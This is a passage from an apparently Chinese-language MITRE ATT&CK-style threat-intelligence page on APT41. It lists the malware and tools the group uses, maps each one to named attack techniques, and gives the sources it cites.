S0013 PlugX APT41 used a variant of PlugX to connect to Windows and Linux systems via SSH and Samba/CIFS.[1][2] 伪装: Masquerade Task or Service, 伪装: Match Legitimate Name or Location, 修改注册表, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 劫持执行流: DLL Side-Loading, 劫持执行流: DLL Search Order Hijacking, 反混淆/解码文件或信息, 可信开发者工具代理执行: MSBuild, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 应用层协议: Web Protocols, 应用层协议: DNS, 文件和目录发现, 本机API, 查询注册表, 混淆文件或信息, 系统网络连接发现, 网络共享发现, 网络服务: Dead Drop Resolver, 虚拟化/沙盒规避: System Checks, 输入工具传输, 输入捕获: Keylogging, 进程发现, 隐藏伪装: Hidden Files and Directories, 非应用层协议
S0194 PowerSploit [2] Windows管理规范, 从密码存储中获取凭证: Windows Credential Manager, 从本地系统获取数据, 创建或修改系统进程: Windows Service, 劫持执行流: Path Interception by PATH Environment Variable, 劫持执行流: Path Interception by Unquoted Path, 劫持执行流: DLL Search Order Hijacking, 劫持执行流: Path Interception by Search Order Hijacking, 反射性代码加载, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 启动或登录自动启动执行: Security Support Provider, 命令与脚本解释器: PowerShell, 域信任发现, 屏幕捕获, 操作系统凭证转储: LSASS Memory, 未加密凭证: Credentials in Registry, 未加密凭证: Group Policy Preferences, 查询注册表, 混淆文件或信息: Indicator Removal from Tools, 混淆文件或信息: Command Obfuscation, 窃取或伪造Kerberos票据: Kerberoasting, 访问令牌操控, 账号发现: Local Account, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 音频捕获, 预定任务/作业: Scheduled Task
S0006 pwdump [2] 操作系统凭证转储: Security Account Manager
S0112 ROCKBOOT [2] 预操作系统引导: Bootkit
S0596 ShadowPad [2][15] 修改注册表, 动态解析: Domain Generation Algorithms, 反混淆/解码文件或信息, 应用层协议: DNS, 应用层协议: File Transfer Protocols, 应用层协议: Web Protocols, 数据编码: Non-Standard Encoding, 混淆文件或信息: Fileless Storage, 混淆文件或信息, 移除指标, 系统信息发现, 系统所有者/用户发现, 系统时间发现, 系统网络配置发现, 输入工具传输, 进程发现, 进程注入, 进程注入: Dynamic-link Library Injection, 非应用层协议, 预定传输
S0225 sqlmap [10] 利用公开应用程序漏洞
S0430 Winnti for Linux [4] Rootkit, 加密通道: Symmetric Cryptography, 反混淆/解码文件或信息, 应用层协议: Web Protocols, 流量激活, 混淆文件或信息: Encrypted/Encoded File, 输入工具传输, 非应用层协议
S0412 ZxShell [2] 从本地系统获取数据, 代理, 修改注册表, 创建或修改系统进程: Windows Service, 创建账户: Local Account, 利用公开应用程序漏洞, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify System Firewall, 妨碍防御: Disable or Modify Tools, 屏幕捕获, 应用层协议: Web Protocols, 应用层协议: File Transfer Protocols, 文件和目录发现, 本机API, 查询注册表, 移除指标: Clear Windows Event Logs, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统信息发现, 系统所有者/用户发现, 系统服务: Service Execution, 系统服务发现, 终端拒绝服务, 网络服务发现, 视频捕获, 访问令牌操控: Create Process with Token, 输入工具传输, 输入捕获: Credential API Hooking, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 远程服务: VNC, 远程服务: Remote Desktop Protocol, 非标准端口

References

  1. Mandiant. (n.d.). APT41, A DUAL ESPIONAGE AND CYBER CRIME OPERATION. Retrieved June 11, 2024.
  2. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
  3. Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
  4. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  5. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  6. Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
  7. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
  8. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
  1. DCSO CyTec Blog. (2022, December 24). APT41 — The spy who failed to encrypt me. Retrieved June 13, 2024.
  2. Nikita Rostovcev. (2022, August 18). APT41 World Tour 2021 on a tight schedule. Retrieved February 22, 2024.
  3. Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved September 12, 2024.
  4. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman & John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved September 16, 2024.
  5. Melikov, D. (2024, April 11). LightSpy Returns: Renewed Espionage Campaign Targets Southern Asia, Possibly India. Retrieved January 14, 2025.
  6. Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.
  7. Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.